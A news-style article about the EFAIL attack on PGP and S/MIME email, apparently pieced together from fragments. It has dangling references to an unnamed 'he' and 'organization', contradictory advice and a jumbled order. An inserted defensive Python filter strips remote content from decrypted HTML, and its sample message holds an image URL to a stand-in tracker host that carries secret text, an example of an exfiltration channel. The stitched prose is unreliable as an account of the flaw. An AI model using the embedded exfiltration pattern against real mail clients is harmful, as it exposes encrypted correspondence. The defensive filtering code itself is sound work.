Security Alert: Stop using PGP and S/MIME now!

The attack, as explained by The Verge, allows "bad actors inject malicious code into intercepted emails, despite encryption protocols created to protect against code injection".

"In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plain text through requested URLs", the researchers write.

It reports that there are two attacks, both of which require that attackers have first obtained a target's ciphertext and that the target is using an HTML email client.

Researchers promised to publish more details tomorrow, Tuesday, May 15.

EFF, the world's biggest digital rights group, which has seen the details, says that such a vulnerability is an "immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages".

The researchers warn that journalists, political activists, and whistleblowers face the most risk from the flaw; for years, PGP has been a go-to tool to secure sensitive emails with a form of end-to-end encryption, with S/MIME acting as an alternative. In the meantime, researchers are advising users to rely on end-to-end encrypted messaging apps instead.

He argued it wasn't really a vulnerability in the OpenPGP system but rather in email programs that had been designed without appropriate safeguards. The organization provided step-by-step guides explaining how to do just that in Apple Mail, Outlook, and Thunderbird, which are the most popular clients affected by EFAIL. While doing so, the client loads any external content, thus exfiltrating the plaintext to the attacker.
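The exfiltration channel described above exists only if the client fetches external content on its own. The following is an added illustration, not code from the researchers or from any mail client: a filter that removes automatically loaded remote references from a decrypted HTML body before it is rendered. The attribute list, the function names and the sample message are assumptions made for this example.

```python
import re
from html import escape
from html.parser import HTMLParser

# Attributes whose URLs a renderer fetches without any click (assumed list, not exhaustive).
AUTO_FETCH = {"src", "srcset", "background", "poster", "data"}
REMOTE = re.compile(r"(?:https?:)?//[^\s'\"()<>,]+", re.I)

class RemoteContentBlocker(HTMLParser):
    """Re-emits HTML with automatically loaded remote references removed."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.blocked, self.in_style = [], [], False

    def _scrub_css(self, css):  # neutralises url(...) and @import targets
        self.blocked += REMOTE.findall(css)
        return REMOTE.sub("about:invalid", css)

    def handle_starttag(self, tag, attrs):
        kept = []
        for name, value in attrs:
            value = value or ""
            if name == "style":
                value = self._scrub_css(value)
            elif name in AUTO_FETCH or (tag == "link" and name == "href"):
                if REMOTE.search(value):
                    self.blocked += REMOTE.findall(value)
                    continue  # drop the attribute so nothing is requested
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.in_style = tag == "style"
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        self.in_style = False
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(self._scrub_css(data) if self.in_style else escape(data, quote=False))

def block_remote_content(html_body):
    """Return (safe_html, blocked_urls) for a decrypted HTML message body."""
    parser = RemoteContentBlocker()
    parser.feed(html_body)
    parser.close()
    return "".join(parser.out), parser.blocked

# Constructed sample body: remote image, inline cid: image, remote CSS background, ordinary link.
SAMPLE = ('<p>Hi</p><img src="http://tracker.example/p?x=SECRET-TEXT"><img src="cid:logo">'
          '<div style="background:url(//cdn.example/bg.png)">x</div><a href="https://example.org/">link</a>')
```

Calling `block_remote_content(SAMPLE)` returns the rewritten body together with the list of URLs that would otherwise have been requested, which is useful for logging. A production filter would start from an allow-list of elements and attributes rather than this deny-list.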

Sebastian Schinzel, who co-authored the research, urged people to disable PGP or S/MIME in their email client until a fix can be issued.

On a website dedicated to the flaw, researchers laid out how attacks would be carried out inside email clients through various code loopholes. While PGP is today owned by Symantec, an open source implementation called GNU Privacy Guard (GPG) has been widely adopted by the security community in a number of contexts; this is referred to as OpenPGP.

Email is no longer a secure communication medium.

"Securely encrypted e-mail remains an important and suitable means of increasing information security", it said in a statement, adding that the flaws which have been discovered can be remedied through patches and proper use.

Direct Exfiltration affects Apple's macOS and iOS Mail clients, as well as Mozilla's Thunderbird, enabling an attacker to send an email that automatically decodes and shares a victim's encrypted message content in a reply.

In this scenario, attackers send a "changed encrypted email" to the victim.

